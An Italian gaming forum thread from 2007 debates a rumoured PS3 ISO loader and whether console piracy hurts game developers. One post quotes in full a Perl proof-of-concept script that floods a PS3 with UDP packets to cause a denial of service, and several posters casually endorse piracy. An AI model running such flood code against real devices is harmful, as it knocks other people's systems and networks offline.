View Full Version : PS3 - ISO LOADER
Everyman
27-03-2007, 12:36
Lo stanno rilasciando in questo momento su PS3.
Senza dare riferimenti a siti e informazioni illegali, che ne pensate di tale cosa?
Conseguenze? :)
BTinside
27-03-2007, 12:40
mi spieghi a cosa serve, come funziona?
IcEMaN666
27-03-2007, 12:42
un pò di fantasia :asd:
Everyman
27-03-2007, 12:43
:asd:
Sei fai un salto nel Playstation Network, la comunita' sonara sta impazzendo per questa notizia proprio ora
IcEMaN666
27-03-2007, 12:44
Sei fai un salto nel Playstation Network, la comunita' sonara sta impazzendo per questa notizia proprio ora
mi mandi un pvt con il link alle info?
tanto non me ne faccio niente, ho già upgradato a 1.6 :asd:
Massimo87
27-03-2007, 12:48
bella mossa per incrementare le vendite :D
IcEMaN666
27-03-2007, 12:48
chiamali scemi:asd:
L'utenza italiana non ha molto da gioire..... la fibra è solo per una nicchia, li voglio vedere a tirare giu' 25gb a botta con adsl:)
IcEMaN666
27-03-2007, 12:53
;16513755']L'utenza italiana non ha molto da gioire..... la fibra è solo per una nicchia, li voglio vedere a tirare giu' 25gb a botta con adsl:)
sinceramente non credo che almeno questi titoli siano così grandi...ovvio quando uscirà final fantasy 27 con 432 ore di filmati in cg ci sarà da mettersi le mani nei capelli per chi vuole provare l'ebrezza di scaricarlo:D
Everyman
27-03-2007, 12:54
;16513755']L'utenza italiana non ha molto da gioire..... la fibra è solo per una nicchia, li voglio vedere a tirare giu' 25gb a botta con adsl:)
Ci sono diversi modi per aggirare questo semplicissimo ostacolo :)
Everyman
27-03-2007, 12:54
mi mandi un pvt con il link alle info?
tanto non me ne faccio niente, ho già upgradato a 1.6 :asd:
Non mettermi in imbarazzo con queste domandine :D
Google e' tuo amico ;)
Senza dare riferimenti a siti e informazioni illegali, che ne pensate di tale cosa?
Era solo questione di tempo. Penso che ormai questo fattore non incida + di tanto sulle vendite per il semplice fatto che sono tutte piratabili.
BTinside
27-03-2007, 13:00
Ma che è ? Segreto di stato?
Serve a riversare i giochi su hdd?
si!Un po' come succede con la PSP!
ShadowThrone
27-03-2007, 13:02
a quando il primo firmware OE ?:sofico:
In teoria(ma forse non troppo) il problema dello scaricamento di molti GB forse lo si potrebbe aggirare facendo il rip dell'iso direttamente dalla PS3 noleggiando o facendosi prestare il Disco!
IcEMaN666
27-03-2007, 13:03
trovato delle info...
funziona solo su 1.51...e soprattutto hanno bloccato lo sviluppo, sembra che il team che ha fatto l'hacking voglia rilasciarlo solo quando sarà compatibile con l'1.6
bhua.....a volte è difficile capire se la gente parla così...tanto per o cosa.
Comunque...non per fare lo sborone, ma con Tiscali Adsl 12mbit/1mbit:
http://img405.imageshack.us/img405/1790/torrentqz9.png
è per rispondere all'OT sulla fibra ottica
Everyman
27-03-2007, 13:06
trovato delle info...
funziona solo su 1.51...e soprattutto hanno bloccato lo sviluppo, sembra che il team che ha fatto l'hacking voglia rilasciarlo solo quando sarà compatibile con l'1.6
Non sai i nuovi sviluppi :fiufiu: :fiufiu: :fiufiu:
Comunque, scherzi a parte, aspettiamoci un comportamento del tutto simile a quello visto su PSP.
Che ci piaccia oppure no, questo, e' un altro discorso.
Maverick491
27-03-2007, 13:07
Beh, non so se è la stessa cosa, ma con psp è possibilissimo comprimere e ridurre le dimensioni del file immagine...
Everyman
27-03-2007, 13:08
Che sboroooooooooneeeeeeeeee:sofico:
:D
Everyman
27-03-2007, 13:08
Beh, non so se è la stessa cosa, ma con psp è possibilissimo comprimere e ridurre le dimensioni del file immagine...
A parte questo...come ha detto qualcuno c'e' la soluzione blockbuster.
E non e' neanche l'unica :O
Sinceramente son stufo del tuo modo di rispondere cercando flames che si ripete da tempo.
Vedi di finirla.
@Per gli altri
Il mio intervento si basava sul fatto che le comuni adsl esempio 4megabit non sono agevolate.
IcEMaN666
27-03-2007, 13:10
Non sai i nuovi sviluppi :fiufiu: :fiufiu: :fiufiu:
Comunque, scherzi a parte, aspettiamoci un comportamento del tutto simile a quello visto su PSP.
Che ci piaccia oppure no, questo, e' un altro discorso.
ho letto ora che è stato trovato un bug nel controllo remoto tra psp e ps3...sembra che vogliono bucarla da lì...almeno è quello che ho trovato in rete :D
hai altre info?
Everyman
;16514115']
Il mio intervento si basava sul fatto che le comuni adsl esempio 4megabit non sono agevolate.
Si, ma basta nolleggiare il gioco da una negozietto e il problema e' risolto ;)
E poi RedSky non e' che abbia tutti i torti eh ;)
Maverick491
Comunque il max sarebbe poter passare il file immagine su hd esterno, collegarlo alla ps3 e copiarlo nel suo hd cosi non ci vuole manco il masterizzatore blu-ray :D
Everyman
27-03-2007, 13:11
ho letto ora che è stato trovato un bug nel controllo remoto tra psp e ps3...sembra che vogliono bucarla da lì...almeno è quello che ho trovato in rete :D
hai altre info?
PSP e' il segreto.
Bravo :D
Per ora, resto abbottonato.
Io la PSP ce l'ho.
Se cosi' dovesse essere vero, la gente acquisterebbe PSP per bucare PS3.
Alla sony sono dei demoni del marketing, davvero :D
Everyman
27-03-2007, 13:12
Comunque il max sarebbe poter passare il file immagine su hd esterno, collegarlo alla ps3 e copiarlo nel suo hd cosi non ci vuole manco il masterizzatore blu-ray :D
:fiufiu: :fiufiu: :fiufiu:
:asd: :asd: :asd:
del loader si legge molto in giro........ma che sia stato rilasciato....non c'è scritto da nessuna parte
IcEMaN666
27-03-2007, 13:14
indovina cosa fa la prima homebrew creata per ps3?:D
;16514115']Sinceramente son stufo del tuo modo di rispondere cercando flames che si ripete da tempo.
Vedi di finirla.
stufo che ti risponda a tono alle fesserie che spari? Non è flame è un dato di fatto che adsl arrivi anche a velocità maggiori. bhua...c'è quel bel pulsantino di "IGNORE" usalo e non star a pianger troppo, grazie.
Everyman
27-03-2007, 13:19
indovina cosa fa la prima homebrew creata per ps3?:D
E bastaaaaaaaaa:D
Attendiamo notizie ufficiali e non commentiamo realta' underground please :asd::fiufiu:
a sto punto sto thread non doveva proprio essere aperto a mio parere....
e le notizie di release si danno quando sono reali e fondate!
e non si danno notizie del tipo: il nonno del cane di mio zio ha il loader tra le mani!
e non si danno notizie del tipo: il nonno del cane di mio zio ha il loader tra le mani!
tra le zampe...al limite...:D
sheijtan
27-03-2007, 13:31
una ps3 facilmente piratabile può favorire le vendite di hardware, non v'è dubbio alcuno. Ma cosa pensate succeda alle vendite del software? Perché è di quello che campano le softco. Sony dovrebbe difendere chi investe denaro (e tanto) per lo sviluppo di giochi per PS3.
goldorak
27-03-2007, 13:36
una ps3 facilmente piratabile può favorire le vendite di hardware, non v'è dubbio alcuno. Ma cosa pensate succeda alle vendite del software? Perché è di quello che campano le softco. Sony dovrebbe difendere chi investe denaro (e tanto) per lo sviluppo di giochi per PS3.
Infatti, non sarebbe salutare che si prospettasse un'altra situazione psp.
Everyman
27-03-2007, 13:37
Ma allora basta non entrarci nel topic se non ti interessa :)
Ciauz!
P.S.: hai un avatr orribilissimo :asd:
Quasi quasi mi ha spaventato :asd:
mi interessa eccome, solo che cercando in giro come dici tu....nessuno parla di rilasci ufficiali.....
si sa... da sempre la sony ha tutelato le software house che decidono di investire soldi nella loro piattaforma...
per fortuna dire... altrimenti saremmo tutti al verde :Prrr:
PSP e' il segreto.
Bravo :D
Per ora, resto abbottonato.
Io la PSP ce l'ho.
Se cosi' dovesse essere vero, la gente acquisterebbe PSP per bucare PS3.
Alla sony sono dei demoni del marketing, davvero :D
vabbe' potrebbero pure farsela prestare bucare la PS3 e restituirla(ammesso che si possa fare).
Piuttosto io non voglio pensare che sia stata fatta di proposito la cosa dalla Sony....altrimenti danno la conferma che quando si lamentano della pirateria(anche quella audio-video dato che sony e' sia casa discografica che cinematografica)lo fanno solo per partito preso e avidita'!A questo punto mi sentirei ancor piu' autorizzato a piratare!
Everyman
27-03-2007, 13:52
si sa... da sempre la sony ha tutelato le software house che decidono di investire soldi nella loro piattaforma...
per fortuna dire... altrimenti saremmo tutti al verde :Prrr:
non fa ridere.
non fa ridere.
e non dovrebbe, è tragica per gli sviluppatori, e son serio
vabbe' potrebbero pure farsela prestare bucare la PS3 e restituirla(ammesso che si possa fare).
Piuttosto io non voglio pensare che sia stata fatta di proposito la cosa dalla Sony....altrimenti danno la conferma che quando si lamentano della pirateria(anche quella audio-video dato che sony e' sia casa discografica che cinematografica)lo fanno solo per partito preso e avidita'!A questo punto mi sentirei ancor piu' autorizzato a piratare!
allora dovremo ampliare il discorso anche alle altre 2: Microsoft e Nintendo.
Microsoft non sta fancendo nulla da più di 8 mesi per limitare firmware Hack (si qualche cosina...con la colla nera...ma niente di che..)..la gente gioca in live senza problemi con i firmware stealth....e del WII? Mai visti così tanti chip dopo neanche 1 mese all'uscita di una console :wtf:
Presumo ed è solamente un mio pensiero personale che sia una tattica di convenienza per tutti a danno di nessuno, forse accettano il compromesso di cercar di vendere più basi installate cercando allo stesso tempo di vendere molti più originali, ma il discorso andrebbe decisamente OT e sarebbe troppo lungo.
Boh però ci vorrebbero notizie maggiori a riguardo (se sono disponibili), rimango in attesa che ci siano aggiornamenti per capire cosa stanno sfruttando per l'iso loader.
Avevo letto di questo:
Playstation 3 "Remote Play" Remote DoS Exploit Mar 26 2007 05:24AM
mak0b inbox com
#!/usr/bin/perl
####.:Playstation 3 "Remote Play" Remote DoS Exploit:.####
#
# A UDP flood while the "remote play" feature is active
# will result in a denial of service condition.
#
# Tested using PS3 v1.60 (20GB) & PSP v3.10 OE-A
#
# -Dark_K <mak0b[AT]inbox.com>
#
# POC code is based on odix's perl udp flooder
##########################################################
use Socket;
$ARGC=@ARGV;
if ($ARGC !=1) {
printf "usage: ./ps3rpdos.pl <ip>\n";
exit(1);
}
socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ARGV[0]");
printf "Sending...\n";
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
http://www.securityfocus.com/archive/1/463847
niente di più...solamente un Proof of concept :boh:
Su questo ti do ragione...anche 15 GB sono un problema con le velocità attuali soprattutto con il misero upload che abbiamo in italia..
allora dovremo ampliare il discorso anche alle altre 2: Microsoft e Nintendo.
Microsoft non sta fancendo nulla da più di 8 mesi per limitare firmware Hack (si qualche cosina...con la colla nera...ma niente di che..)..la gente gioca in live senza problemi con i firmware stealth....e del WII? Mai visti così tanti chip dopo neanche 1 mese all'uscita di una console :wtf:
Presumo ed è solamente un mio pensiero personale che sia una tattica di convenienza per tutti a danno di nessuno, forse accettano il compromesso di cercar di vendere più basi installate cercando allo stesso tempo di vendere molti più originali, ma il discorso andrebbe decisamente OT e sarebbe troppo lungo.
Sicuramente.....infatti io in questo caso ho parlato di sony...ma sappiamo benissimo come la pirateria abbia consentito a Microsoft di essere cio' che e' adesso.La pirateria diciamo che conviene a molti(se non proprio a tutti).E se dovessero essere le case a foraggiarla indirettamente..meglio cosi'...saremo tutti piu' liberi di scegliere!
è esatto, se fosse vero, anche in un futuro prossimo, questo iso loader, sarebbe drammatico per chi come me ha la ps3,
perchè si arriverebbe ad avere tutti i giochi su hd senza pagarli, ma nessun gioco nuovo con cui poter giocare,
esempio: perchè epic games dovrebbe investire 10milioni di dollari per un gioco su ps3 quando si sà che verrà piratato?
finirà come con il pc, con la fuga delle software house su console,
(e vi parla uno che ha fastweb e amici con psp. ndr)
Everyman
27-03-2007, 16:09
è esatto, se fosse vero, anche in un futuro prossimo, questo iso loader, sarebbe drammatico per chi come me ha la ps3,
perchè si arriverebbe ad avere tutti i giochi su hd senza pagarli, ma nessun gioco nuovo con cui poter giocare,
esempio: perchè epic games dovrebbe investire 10milioni di dollari per un gioco su ps3 quando si sà che verrà piratato?
la questione, in effetti, e' spinosissima.
Attendiamo gli sviluppi e vedremo.
Ma temo che la pirateria sara' inevitabile anche su PS3 :)
Bisogna vedere come verra' arginata perche' imho si puo' solo arginare.
E' un problema culturale imho.
.....esempio: perchè epic games dovrebbe investire 10milioni di dollari per un gioco su ps3 quando si sà che verrà piratato?
non sono molto d'accordo su questa cosa; con un ragionamento così Capcom non faceva il multipiattaforma di DCM4 facendolo uscire su X360 sapendo che il firmware hack è una realtà molto affermata.. Rayman raving Rabbit potevano non farlo uscire per PS2 ma solo per WII (poichè al momento era l'unica non piratata).
Penso che sia sbagliato affrontarla in questa maniera, perchè pensare di bloccare lo sviluppo di un gioco perchè la console è piratata...boh... cioè PSX e PS2 non mi pare che siano rimaste verginelle...anzi... e hanno fatto il botto lo stesso con grandissime vendite.
Idem delle pietre miliari dell'online per PC e il PC è palesemente la piattaforma con più sw piratati. La pirateria c'è..c'è stata..e ci sarà...sempre comunque nel bene e nel male, ma stiamo andando un pò OT sob sob :(
;16514115']Sinceramente son stufo del tuo modo di rispondere cercando flames che si ripete da tempo.
Vedi di finirla.
@Per gli altri
Qui l'unico che ha stufato sei te, che ti dà fastidio e replichi da cane a qualsiasi notizia che riguarda la PS3 , quindi piantala te .
non sono molto d'accordo su questa cosa; con un ragionamento così Capcom non faceva il multipiattaforma di DCM4 facendolo uscire su X360 sapendo che il firmware hack è una realtà molto affermata.. Rayman raving Rabbit potevano non farlo uscire per PS2 ma solo per WII (poichè al momento era l'unica non piratata).
Penso che sia sbagliato affrontarla in questa maniera, perchè pensare di bloccare lo sviluppo di un gioco perchè la console è piratata...boh... cioè PSX e PS2 non mi pare che siano rimaste verginelle...anzi... e hanno fatto il botto lo stesso con grandissime vendite.
Idem delle pietre miliari dell'online per PC e il PC è palesemente la piattaforma con più sw piratati. La pirateria c'è..c'è stata..e ci sarà...sempre comunque nel bene e nel male, ma stiamo andando un pò OT sob sob :(
a me pare ci sia molta differenza fra gli hack 360, i modchip wii e il "prendere un gioco e scaricarlo sull'hard disk nella ps3" che si prospetta,
per le prime due bisogna "sbattersi", per la ps3 invece sarebbe un "hack per tutti", della difficoltà del pc insomma, ecco perchè sarebbe drammatico
Everyman
27-03-2007, 16:35
Qui l'unico che ha stufato sei te, che ti dà fastidio e replichi da cane a qualsiasi notizia che riguarda la PS3 , quindi piantala te .
Ora aspettati l'accusa di essere fanboy :asd:
Coyote74
27-03-2007, 16:36
a me pare ci sia molta differenza fra gli hack 360, i modchip wii e il "prendere un gioco e scaricarlo sull'hard disk nella ps3" che si prospetta,
per le prime due bisogna "sbattersi", per la ps3 invece sarebbe un "hack per tutti", della difficoltà del pc insomma, ecco perchè sarebbe drammatico
Ma sbattersi su cosa? Tutti quanti siamo capagi a prendere una console e portarla da qualche "esperto mod" per farcela aprire... dai non diciamo stupidaggini:D
Coyote74
Sei solo un fanboy sonaro fino alle natiche:O
Everyman
Capisco e sono d'accordo con te.
Comunque vediamo come si evolve la questione.
Qualcosa, comunque, si sta gia' muovendo.
Che sia per questo motivo che sony abbia rilasciato il firmware 1.6 con cosi' tanta prontezza fin dal day 1?
Per tappare certi buchi?
Non vedo la differenza tra le 2 questioni cmq sempre di pirateria si tratta e questa ci sta fin dai tempi del Commodore 64 .
O che Hackeri un lettore DVD (XBOX360) o che installi un ModChip (Nintendo Wii) o che non aggiorni la console e aspetti il rilascio di un programma (PS3) sempre uno è lo scopo, non pagare i giochi .
Sei solo un fanboy sonaro fino alle natiche:O
Grazie gli altri invece sono tutti Xboxiani integralisti fino al midollo :O .
O che Hackeri un lettore DVD (XBOX360) o che installi un ModChip (Nintendo Wii) o che non aggiorni la console e aspetti il rilascio di un programma (PS3) sempre uno è lo scopo, non pagare i giochi .
no fermo... non mi dire che aprire una console per installarsi un modchip, o fare la stessa cosa per aggiornare un firmware (neppure di tutti i lettori e neppure con tutte le main.board) è la stessa cosa che scaricare il gioco su HD senza modificare nulla...
non mi pare proprio la stessa cosa...
se dovessi scegliere... prenderei la PS3 proprio per la SUA FACILITA' alla sprotezione, a leggere le guide della 360 ti passa la voglia per lo sbattimento... per non dire la comodità di eseguire giochi dall'HD... veloce, silenzioso e pratico, il top.
rimpiango la vecchia xbox...
Ma sbattersi su cosa? Tutti quanti siamo capagi a prendere una console e portarla da qualche "esperto mod" per farcela aprire... dai non diciamo stupidaggini:D
Quoto..tra l'altro i giochi xbox360 e wii sono "piccoli" e facili da scaricare rispetto ai mallopponi della ps3
no fermo... non mi dire che aprire una console per installarsi un modchip, o fare la stessa cosa per aggiornare un firmware (neppure di tutti i lettori e neppure con tutte le main.board) è la stessa cosa che scaricare il gioco su HD senza modificare nulla...
non mi pare proprio la stessa cosa...
se dovessi scegliere... prenderei la PS3 proprio per la SUA FACILITA' alla sprotezione, a leggere le guide della 360 ti passa la voglia per lo sbattimento... per non dire la comodità di eseguire giochi dall'HD... veloce, silenzioso e pratico, il top.
rimpiango la vecchia xbox...
E' la stessa identica cosa visto che lo scopo è sempre unico "giocare a sbafo" poi sono capaci tutti di dare 20 euro al negozietto per hakerargli il lettore o montargli un chippetto .
NON DICIAMO BAGGIANATE .
E' la stessa identica cosa visto che lo scopo è sempre unico "giocare a sbafo" poi sono capaci tutti di dare 20 euro al negozietto per hakerargli il lettore o montargli un chippetto .
NON DICIAMO BAGGIANATE .
20 € ???
20 euro era il prezzo se me lo facevo io... io in giro leggo cifre diverse...
20 € ???
20 euro era il prezzo se me lo facevo io... io in giro leggo cifre diverse...
E mi dispiace, vuol dire che gli altri si fanno fregare .
Everyman
27-03-2007, 16:56
NON DICIAMO BAGGIANATE .
Consiglio: lascia perdere. Fiato sprecato ;)
Ehhh mi sà propio che hai ragione :) . Non cè peggior sordo di chi non vuol sentire .
Massimo87
27-03-2007, 17:00
mah.. io aspetterei..
vada per i giochi da 4/5gb (sempre tanti.. se presi dal mulo), vi voglio vedere a scaricare i giochi + pesanti da 10-15gb sempre dal mulo (forse dal torrente si può pure fare) ma il problema principale è..
dove li piazzate poi sti giochi? non potete mica masterizzarli su un dvd :D
IcEMaN666
27-03-2007, 17:01
mah.. io aspetterei..
vada per i giochi da 4/5gb (sempre tanti.. se presi dal mulo), vi voglio vedere a scaricare i giochi + pesanti da 10-15gb sempre dal mulo (forse dal torrente si può pure fare) ma il problema principale è..
dove li piazzate poi sti giochi? non potete mica masterizzarli su un dvd :D
hd esterno usb!
Quincy_it
27-03-2007, 17:03
non sono molto d'accordo su questa cosa; con un ragionamento così Capcom non faceva il multipiattaforma di DCM4 facendolo uscire su X360 sapendo che il firmware hack è una realtà molto affermata..
[cut]
La pirateria c'è..c'è stata..e ci sarà...sempre comunque nel bene e nel male, ma stiamo andando un pò OT sob sob :(
Quoto.
Io credo che il ragionamento delle software house sia quello di sviluppare sulle piattaforme a maggior diffusione. La pirateria ci sarà sempre e comunque (non parlo solo dell'Italia, provate a vedere Stati come Thailandia, Malesia, ecc ;) ), ma (esempio) un conto è vendere per il 50% di Ps2 vendute nel mondo, un conto è quel 50% riferito alla Psp.
La mod del lettore dvd della Xbox 360 è di una semplicità unica,
e non si invalida la garanzia. ;)
Perchè Play e Play2 hanno venduto così tanto? Sicuramente una certa rilevanza in tal senso l'ha avuto il fatto che fosse relativamente facile modificarle. Alla Sony (così come ha imparato Microsoft) non importa più di tanto rendere "inattacabile" la sua console, semmai l'obiettivo è riuscire a vendere il maggior numero possibile. Anche la casa di Zio Bill con Windows potrebbe rendere molto più difficile craccare i suoi SO, ma gli converrebbe davvero perdere "clientela"?
Console più diffusa = software house più invogliate a sviluppare titoli.
Massimo87
27-03-2007, 17:03
hd esterno usb!
ma lol :D
hd esterno usb!
Pure quello interno da 60gb ;) (con Iso da 5-6 gb oppure 3 giochi da 15gb l'uno) .
BTinside
27-03-2007, 17:04
...
hai pvt
IcEMaN666
27-03-2007, 17:05
ma lol :D
già testato per altre applicazioni funziona...e uno pure picccolo che so da 160/250gb oramai hanno un prezzo ridicolo...e sicuramente un transfer rate maggiore di qualsiasi supporto ottico che la ps3 può leggere :D
evvai everycoso pure qui.
vediamo se riesci a far chiudere pure questo.
mai un commento rispettoso e costruttivo.
ah ok...si sul piano tecnico dici..che l'iso loader sarebbe una cosa "alla portata di tutti" (più o meno) invece di saldature..(come aver avuto sin dall'inizio la mod software per xbox, una cosa simile intendi?)
Sì da questo punto di vista hai ragione, non avevo valutato quest'altro aspetto; nel mio ragionamento avevo preso in considerazione il concetto in se di far girare copie, non la semplicità dell'operazione. pardon :p
*sasha ITALIA*
27-03-2007, 17:59
sono contento :D
Non me ne frega niente ma almeno mi rilasceranno 20.000 firmware con altrettanti miglioramenti :O
IcEMaN666
27-03-2007, 18:00
sono contento :D
Non me ne frega niente ma almeno mi rilasceranno 20.000 firmware con altrettanti miglioramenti :O
20.000 possibilità di mandare la ps3 al creatore:mc:
e non dovrebbe, è tragica per gli sviluppatori, e son serio
e allora?gli sviluppatori pensano al loro guadagno(dando titoli in multipiatta) e la sony pensa al suo di guadagno...d'altronde x eguagliare le vendite di ps2 un po di furbizia ci vuole
e allora?gli sviluppatori pensano al loro guadagno(dando titoli in multipiatta) e la sony pensa al suo di guadagno...d'altronde x eguagliare le vendite di ps2 un po di furbizia ci vuole
e vabbe' dai......allora se facessero tutte le esclusive per la sony i pirati non farebbero in modo di hackerare la console per farci andare i backup o le .iso????
Scusa se te lo dico ma lo trovo molto infantile come ragionamento.
e vabbe' dai......allora se facessero tutte le esclusive per la sony i pirati non farebbero in modo di hackerare la console per farci andare i backup o le .iso????
Scusa se te lo dico ma lo trovo molto infantile come ragionamento.
scusa, ma che c@xxo centra?? sony sa che puo vendere un numero maggiore di macchine se gli acquirenti possono...ehm...pagare poco i giochi...ed è su questo che punta, vendere le macchine!alla fine ci puo smenare solo se piratano i suoi giochi interni, che non sono moltissimi(gt,gow...)... e cn ps2 qst ragionamento ha pure funzionato
PS.il "ragionamento infantile" ha contribuito a piazzare 120.000.000 di console la scorsa generazione
ma sei serio?
se si ti chiedo quanti anni hai?
no perchè se seriamente mi rispondi "e allora?"... boh io non so se neppure conviene iniziare una discussione con te.
qui stiamo parlando di AZIENDE con parecchie persone, con parecchi INVESTIMENTI, che pagano royalty per sviluppare su una console, cha pagano per le librerie, per il supporto e per le macchine su cui sviluppare...
e avere un prodotto non piratabile significa aver le potenzialità di un ritorno economico garantito...
se tu azzeri sto discorso, se considerei solo sufficiente e giustificato che la sony renda facilmente piratabile la sua console allo scopo di venderlo anche a danno degli sviluppatori, allora io ti domando...
perchè io mai dovrei investire, tempo, risorse, denaro e altro, per fare un gioco per te bimbominchia che me lo copi in accordo con il produttore della console?
perchè mai dovrei?
per farti contento?
scusa... ma lo sai che babbo natale non esiste?
seriamente... se questo è il livello della discussione, allora tanto vale non partecipare più a questo topic...
ma sei serio?
se si ti chiedo quanti anni hai?
no perchè se seriamente mi rispondi "e allora?"... boh io non so se neppure conviene iniziare una discussione con te.
qui stiamo parlando di AZIENDE con parecchie persone, con parecchi INVESTIMENTI, che pagano royalty per sviluppare su una console, cha pagano per le librerie, per il supporto e per le macchine su cui sviluppare...
e avere un prodotto non piratabile significa aver le potenzialità di un ritorno economico garantito...
se tu azzeri sto discorso, se considerei solo sufficiente e giustificato che la sony renda facilmente piratabile la sua console allo scopo di venderlo anche a danno degli sviluppatori, allora io ti domando...
perchè io mai dovrei investire, tempo, risorse, denaro e altro, per fare un gioco per te bimbominchia che me lo copi in accordo con il produttore della console?
perchè mai dovrei?
per farti contento?
scusa... ma lo sai che babbo natale non esiste?
seriamente... se questo è il livello della discussione, allora tanto vale non partecipare più a questo topic...
Acoso, mettimi in ignore e finiamola qua, non mi va d perdere tempo a rispondere a te, che probabilmente non sai manco cos'è il marketing :)
scusa, ma che c@xxo centra?? sony sa che puo vendere un numero maggiore di macchine se gli acquirenti possono...ehm...pagare poco i giochi...ed è su questo che punta, vendere le macchine!alla fine ci puo smenare solo se piratano i suoi giochi interni, che non sono moltissimi(gt,gow...)... e cn ps2 qst ragionamento ha pure funzionato
PS.il "ragionamento infantile" ha contribuito a piazzare 120.000.000 di console la scorsa generazione
quindi tu affermi che la Sony ha un comportamento fraudolento e perpetra da anni frodi(perche' se fosse come dici tu di questo si tratta)nei confronti delle software house collusa con i pirati di mezzo mondo???
sono basito......
Acoso, mettimi in ignore e finiamola qua, non mi va d perdere tempo a rispondere a te, che probabilmente non sai manco cos'è il marketing :)
guarda... se vogliamo parlare di marketing possiamo pure confrontare le nostre posizioni lavorative :cool:
ma se vuoi spacciare il marketing per incentivo alla pirateria, che è reato, allora mi sa che devi chiarirti le idee...
lanci il sasso e poi chiedi di essere ignorato?
strani utenti... bha.
quindi tu affermi che la Sony ha un comportamento fraudolento e perpetra da anni frodi(perche' se fosse come dici tu di questo si tratta)nei confronti delle software house collusa con i pirati di mezzo mondo???
sono basito......
ha chiesto di essere ignorato, e magari pure te non sai cos'è il marketing, lui si.
dico solo che la sony sa come vendere, se sia o meno fraudolento non sta a me dirlo... :)
dico solo che la sony sa come vendere, se sia o meno fraudolento non sta a me dirlo... :)
come scusa?
vabbè ok... capito il livello... sono fuori luogo io.
migro altrove.
jpjcssource
27-03-2007, 21:14
Vabbè e te allora lo sai invece, mi sa invece che sei uno che lo subisce il marketing più che comprenderlo o attuarlo :asd:
kenjcj2000
27-03-2007, 21:40
come scusa?
vabbè ok... capito il livello... sono fuori luogo io.
migro altrove.
addami.... mi sembra che mi son perso roba da dirti x strada:sofico:
Timewolf
27-03-2007, 21:51
Tsk dilettante
HTTP richiesta inviata, aspetto la risposta... 200 OK
Lunghezza: 667,119,616 [text/plain]
2% [=> ] 14,460,032 2.42M/s ETA 04:26
:sofico: :sofico: :sofico:
Tornando IT, chissa' se e' tutto "casuale" sta cosa :asd:
Ma homebrew girano?
Everyman
lascia perdere Johnny, non roviniamo questo topic che imho puo' essere interessante ;)
Abanjo: Utente sospeso
Nient'altro da aggiungere e torniamo in topic :)
Everyman
Tsk dilettante
HTTP richiesta inviata, aspetto la risposta... 200 OK
Lunghezza: 667,119,616 [text/plain]
2% [=> ] 14,460,032 2.42M/s ETA 04:26
:sofico: :sofico: :sofico:
:eek: :eek: :eek:
Timewolf
27-03-2007, 22:00
:eek: :eek: :eek:
Ho il disco fisso che mi fa da collo di bottiglia :O
Everyman
27-03-2007, 22:01
Ho il disco fisso che mi fa da collo di bottiglia :O
omg
aspetto i cf per ps3 come quelli rilasciati per psp!
se ne sa niente?
IcEMaN666
27-03-2007, 22:42
se ne sa niente?
ma perchè non li compramo sti giochi invece?:stordita:
ci lamentiamo sempre che gli sviluppatori fanno i multipiatta, le piccole software house fanno fatica a stare in piedi, l'ea ogni anno tira fuori la sua dozzina di titoli merdosi:asd:
tanto alla fine esce meno di una k.a. al mese...una spesa sostenibilissima...almeno dal mio punto di vista eh:)
ma perchè non li compramo sti giochi invece?:stordita:
ci lamentiamo sempre che gli sviluppatori fanno i multipiatta, le piccole software house fanno fatica a stare in piedi, l'ea ogni anno tira fuori la sua dozzina di titoli merdosi:asd:
tanto alla fine esce meno di una k.a. al mese...una spesa sostenibilissima...almeno dal mio punto di vista eh:)
ho parlato forse di pirateria??? :mbe:
cf non è mica = a pirateria....sei fuori strada amico! :rolleyes:
IcEMaN666
27-03-2007, 22:45
ho parlato forse di pirateria??? :mbe:
cf non è mica = a pirateria....sei fuori strada amico! :rolleyes:
eh si ovviamente tutti a smaniare per le homebrew no:mc:
eh si ovviamente tutti a smaniare per le homebrew no:mc:
non direi,adesso ti istruisco un pò:
-la possibilità di avere un sistema "aperto"
-mille mila programmi per fare tutto(psp docet)
-load di iso(dei proprio giochi da hd)
-personalizzazione di tutta la dashboard per come si vuole
-player divx,ed altri formati
-e altro ancora!
ora non è per fare polemica giusto,ma come mai vien sempre da attaccare dicendo "pirateria,qua e la,compra i giochi ecc ecc" se nemmeno sai per cosa utilizzo il cf e deduci tutto da una semplice frase:
se ne sa niente?
???
spero cambi idea,così continuiamo il 3d senza andare in ot e flame inutili! :)
ciauzzzzz
IcEMaN666
27-03-2007, 22:54
non direi,adesso ti istruisco un pò:
-la possibilità di avere un sistema "aperto"
-mille mila programmi per fare tutto(psp docet)
-load di iso(dei proprio giochi da hd)
-personalizzazione di tutta la dashboard per come si vuole
-player divx,ed altri formati
-e altro ancora!
ora non è per fare polemica giusto,ma come mai vien sempre da attaccare dicendo "pirateria,qua e la,compra i giochi ecc ecc" se nemmeno sai per cosa utilizzo il cf e deduci tutto da una semplice frase:
???
spero cambi idea,così continuiamo il 3d senza andare in ot e flame inutili! :)
ciauzzzzz
non è assolutamente flame, ti sto rispondendo e basta.
non cerchiamo i flame quando non ci sono ;)
cmq è INNEGABILE che il 99% delle persone userà sto loader e eventuali cf SOLO per i backup.
tanto per dirne una, oggi pm mi è arrivato un pvt da un utente che ha partecipato a questa discussione con scritto "mi dai dei link per leggere? sarebbe l'unico motivo per prendere la ps3"...quindi fai tu...
ah...
quasi tutto quello che hai elencato lo fai senza taroccare nulla...installi linux e via :D
non è assolutamente flame, ti sto rispondendo e basta.
non cerchiamo i flame quando non ci sono ;)
cmq è INNEGABILE che il 99% delle persone userà sto loader e eventuali cf SOLO per i backup.
tanto per dirne una, oggi pm mi è arrivato un pvt da un utente che ha partecipato a questa discussione con scritto "mi dai dei link per leggere? sarebbe l'unico motivo per prendere la ps3"...quindi fai tu...
ah...
quasi tutto quello che hai elencato lo fai senza taroccare nulla...installi linux e via :D
ok,ci siamo chiariti,almeno spero!
bhe vedi,se molti utenti utilizzano il cf per scopi illegali non è colpa mia ne tua,purtroppo non si capisce che così si danneggia la software house e di conseguenza noi stessi consumatori!
per il discorso linux....hai visto quanto tempo ci sta ad avviarsi??? :eek:
aspetto il cf! ;)
ciauzzzzzzzz
IcEMaN666
27-03-2007, 23:01
ok,ci siamo chiariti,almeno spero!
bhe vedi,se molti utenti utilizzano il cf per scopi illegali non è colpa mia ne tua,purtroppo non si capisce che così si danneggia la software house e di conseguenza noi stessi consumatori!
per il discorso linux....hai visto quanto tempo ci sta ad avviarsi??? :eek:
aspetto il cf! ;)
